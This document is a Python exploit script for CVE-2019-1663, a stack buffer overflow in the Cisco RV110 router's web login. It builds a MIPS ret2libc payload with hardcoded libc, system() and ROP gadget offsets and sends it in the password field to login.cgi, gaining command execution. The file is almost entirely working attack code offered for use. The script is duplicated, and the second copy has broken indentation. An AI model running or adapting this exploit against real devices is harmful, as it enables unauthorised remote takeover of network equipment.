qkaiser/CVE_2019_1663_RV110.py

## CVE_2019_1663_RV110.py
#!/usr/bin/env python
"""
Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663).
---------------------------------------------------------------
It simply executes a ret2libc, calling system() with whatever's on the stack
as argument. Offsets are for QEMU target.

First MIPS-based exploit, might delete later.
"""
import requests
import sys
import struct
import string

# libraries and offsets
libc = 0x77aff000
system_offset = 0x00050d70
gadget1_offset = 0x00024098 # addiu $a0, $sp, 0x20; lw $gp, 0x10($sp); lw $ra, 0x18($sp); jr $ra; addiu $sp, $sp, 0x20;
bypass = 0x7ffde010
gp_address = 0x77ba4560

message = "A" * 105 # Padding
message += struct.pack("<L", libc+gadget1_offset) #
message += struct.pack("<L", bypass) * 4
message += struct.pack("<L", gp_address) # this is a valid value for GP, however %60 is a backtick that might get in the way of execution with busybox.
message += "BBBB"
message += struct.pack("<L", libc+system_offset) # ra
message += "ZZZZ"
# cmd must be less than 24 characters so we can keep proper Global Pointer val
cmd = "ping -c3 127.0.0.1 #"
message += "#" * int(len(cmd) % 4)
message += struct.pack("<L", gp_address) * 20

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: %s ip" % (sys.argv[0])
        sys.exit(1)
    params = {
    "submit_button": "login",
    "submit_type": None,
    "gui_action": None,
    "wait_time": 0,
    "change_action": None,
    "enc": 1,
    "user": "cisco",
    "pwd": message,
    "sel_lang": "EN"
    }
    requests.post("https://%s/login.cgi" % sys.argv[1], data=params, verify=False)
	#!/usr/bin/env python
	"""
	Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663).
	---------------------------------------------------------------
	It simply executes a ret2libc, calling system() with whatever's on the stack
	as argument. Offsets are for QEMU target.

	First MIPS-based exploit, might delete later.
	"""
	import requests
	import sys
	import struct
	import string

	# libraries and offsets
	libc = 0x77aff000
	system_offset = 0x00050d70
	gadget1_offset = 0x00024098 # addiu $a0, $sp, 0x20; lw $gp, 0x10($sp); lw $ra, 0x18($sp); jr $ra; addiu $sp, $sp, 0x20;
	bypass = 0x7ffde010
	gp_address = 0x77ba4560

	message = "A" * 105 # Padding
	message += struct.pack("<L", libc+gadget1_offset) #
	message += struct.pack("<L", bypass) * 4
	message += struct.pack("<L", gp_address) # this is a valid value for GP, however %60 is a backtick that might get in the way of execution with busybox.
	message += "BBBB"
	message += struct.pack("<L", libc+system_offset) # ra
	message += "ZZZZ"
	# cmd must be less than 24 characters so we can keep proper Global Pointer val
	cmd = "ping -c3 127.0.0.1 #"
	message += "#" * int(len(cmd) % 4)
	message += struct.pack("<L", gp_address) * 20

	if __name__ == '__main__':
	if len(sys.argv) != 2:
	print "Usage: %s ip" % (sys.argv[0])
	sys.exit(1)
	params = {
	"submit_button": "login",
	"submit_type": None,
	"gui_action": None,
	"wait_time": 0,
	"change_action": None,
	"enc": 1,
	"user": "cisco",
	"pwd": message,
	"sel_lang": "EN"
	}
	requests.post("https://%s/login.cgi" % sys.argv[1], data=params, verify=False)